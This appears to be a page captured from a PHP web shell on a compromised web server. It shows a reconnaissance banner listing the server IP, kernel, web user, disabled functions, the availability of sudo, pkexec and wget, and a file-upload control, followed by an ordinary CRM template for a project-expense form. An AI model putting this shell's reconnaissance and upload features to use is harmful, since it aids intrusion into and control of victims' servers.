| Server IP : 103.161.17.216 / Your IP : 216.73.216.1 Web Server : nginx/1.18.0 System : Linux tipsysaigoncharming 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64 User : www-data ( 33) PHP Version : 7.4.3-4ubuntu2.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare, MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : ON Directory : /var/www/app.houseland.info/application/views/admin/projects/ |
Upload File : |
<?php defined('BASEPATH') or exit('No direct script access allowed'); ?>
<div id="expenses_total" class="tw-mb-4"></div>
<?php if (staff_can('create', 'expenses')) { ?>
<a href="#" data-toggle="modal" data-target="#new_project_expense" class="btn btn-primary tw-mb-4">
<i class="fa-regular fa-plus tw-mr-1"></i>
<?php echo _l('new_expense'); ?>
</a>
<?php } ?>
<div id="vueApp" class="tw-inline pull-right tw-ml-0 sm:tw-ml-1.5">
<app-filters
id="<?php echo $expenses_table->id(); ?>"
view="<?php echo $expenses_table->viewName(); ?>"
:saved-filters="<?php echo $expenses_table->filtersJs(); ?>"
:available-rules="<?php echo $expenses_table->rulesJs(); ?>">
</app-filters>
</div>
<div class="clearfix"></div>
<div class="panel_s panel-table-full">
<div class="panel-body">
<?php
echo form_hidden('custom_view');
$this->load->view('admin/expenses/table_html', [
'class' => 'project-expenses',
'withBulkActions' => false,
'table_id'=>'project_expenses'
]);
?>
</div>
</div>
<div class="modal fade" id="new_project_expense" tabindex="-1" role="dialog">
<div class="modal-dialog">
<div class="modal-content">
<?php echo form_open(admin_url('projects/add_expense'), ['id' => 'project-expense-form', 'class' => 'dropzone dropzone-manual']); ?>
<div class="modal-header">
<button type="button" class="close" data-dismiss="modal" aria-label="Close"><span
aria-hidden="true">×</span></button>
<h4 class="modal-title"><?php echo e(_l('add_new', _l('expense_lowercase'))); ?></h4>
</div>
<div class="modal-body">
<div id="dropzoneDragArea" class="dz-default dz-message">
<span><?php echo _l('expense_add_edit_attach_receipt'); ?></span>
</div>
<div class="dropzone-previews"></div>
<i class="fa-regular fa-circle-question" data-toggle="tooltip"
data-title="<?php echo _l('expense_name_help'); ?>"></i>
<?php echo render_input('expense_name', 'expense_name'); ?>
<?php echo render_textarea('note', 'expense_add_edit_note', '', ['rows' => 4], []); ?>
<?php echo render_select('category', $expense_categories, ['id', 'name'], 'expense_category'); ?>
<?php echo render_date_input('date', 'expense_add_edit_date', _d(date('Y-m-d'))); ?>
<?php echo render_input('amount', 'expense_add_edit_amount', '', 'number'); ?>
<div class="row mbot15">
<div class="col-md-6">
<div class="form-group">
<label class="control-label" for="tax"><?php echo _l('tax_1'); ?></label>
<select class="selectpicker display-block" data-width="100%" name="tax"
data-none-selected-text="<?php echo _l('dropdown_non_selected_tex'); ?>">
<option value=""><?php echo _l('no_tax'); ?></option>
<?php foreach ($taxes as $tax) { ?>
<option value="<?php echo e($tax['id']); ?>" data-subtext="<?php echo e($tax['name']); ?>">
<?php echo e($tax['taxrate']); ?>%</option>
<?php } ?>
</select>
</div>
</div>
<div class="col-md-6">
<div class="form-group">
<label class="control-label" for="tax2"><?php echo _l('tax_2'); ?></label>
<select class="selectpicker display-block" data-width="100%" name="tax2"
data-none-selected-text="<?php echo _l('dropdown_non_selected_tex'); ?>" disabled>
<option value=""><?php echo _l('no_tax'); ?></option>
<?php foreach ($taxes as $tax) { ?>
<option value="<?php echo e($tax['id']); ?>" data-subtext="<?php echo e($tax['name']); ?>">
<?php echo e($tax['taxrate']); ?>%</option>
<?php } ?>
</select>
</div>
</div>
</div>
<div class="hide">
<?php echo render_select('currency', $currencies, ['id', 'name', 'symbol'], 'expense_currency', $currency->id); ?>
</div>
<?php
$customer_expense_data = [];
$_customer_expense_data = [];
$_customer_expense_data['userid'] = $project->client_data->userid;
$_customer_expense_data['company'] = $project->client_data->company;
$customer_expense_data[] = $_customer_expense_data;
echo render_select('clientid', $customer_expense_data, ['userid', 'company'], 'expense_add_edit_customer', $project->clientid); ?>
<div class="checkbox checkbox-primary">
<input type="checkbox" id="billable" name="billable" checked>
<label for="billable"><?php echo _l('expense_add_edit_billable'); ?></label>
</div>
<?php echo render_input('reference_no', 'expense_add_edit_reference_no'); ?>
<?php $selected = (isset($expense) ? $expense->paymentmode : ''); ?>
<?php
// Fix becuase payment modes are used for invoice filtering and there needs to be shown all
// in case there is payment made with payment mode that was active and now is inactive
$expenses_modes = [];
foreach ($payment_modes as $m) {
if (isset($m['invoices_only']) && $m['invoices_only'] == 1) {
continue;
}
if ($m['active'] == 1) {
$expenses_modes[] = $m;
}
}
?>
<?php echo render_select('paymentmode', $expenses_modes, ['id', 'name'], 'payment_mode', $selected); ?>
<div class="clearfix mbot15"></div>
<?php echo render_custom_fields('expenses'); ?>
<?php echo form_hidden('project_id', $project->id); ?>
<?php echo form_hidden('clientid', $project->clientid); ?>
<div class="clearfix"></div>
</div>
<div class="modal-footer">
<button type="button" class="btn btn-default" data-dismiss="modal"><?php echo _l('close'); ?></button>
<button type="submit" class="btn btn-primary"><?php echo _l('submit'); ?></button>
</div>
<?php echo form_close(); ?>
</div>
<!-- /.modal-content -->
</div>
<!-- /.modal-dialog -->
</div>
<!-- /.modal -->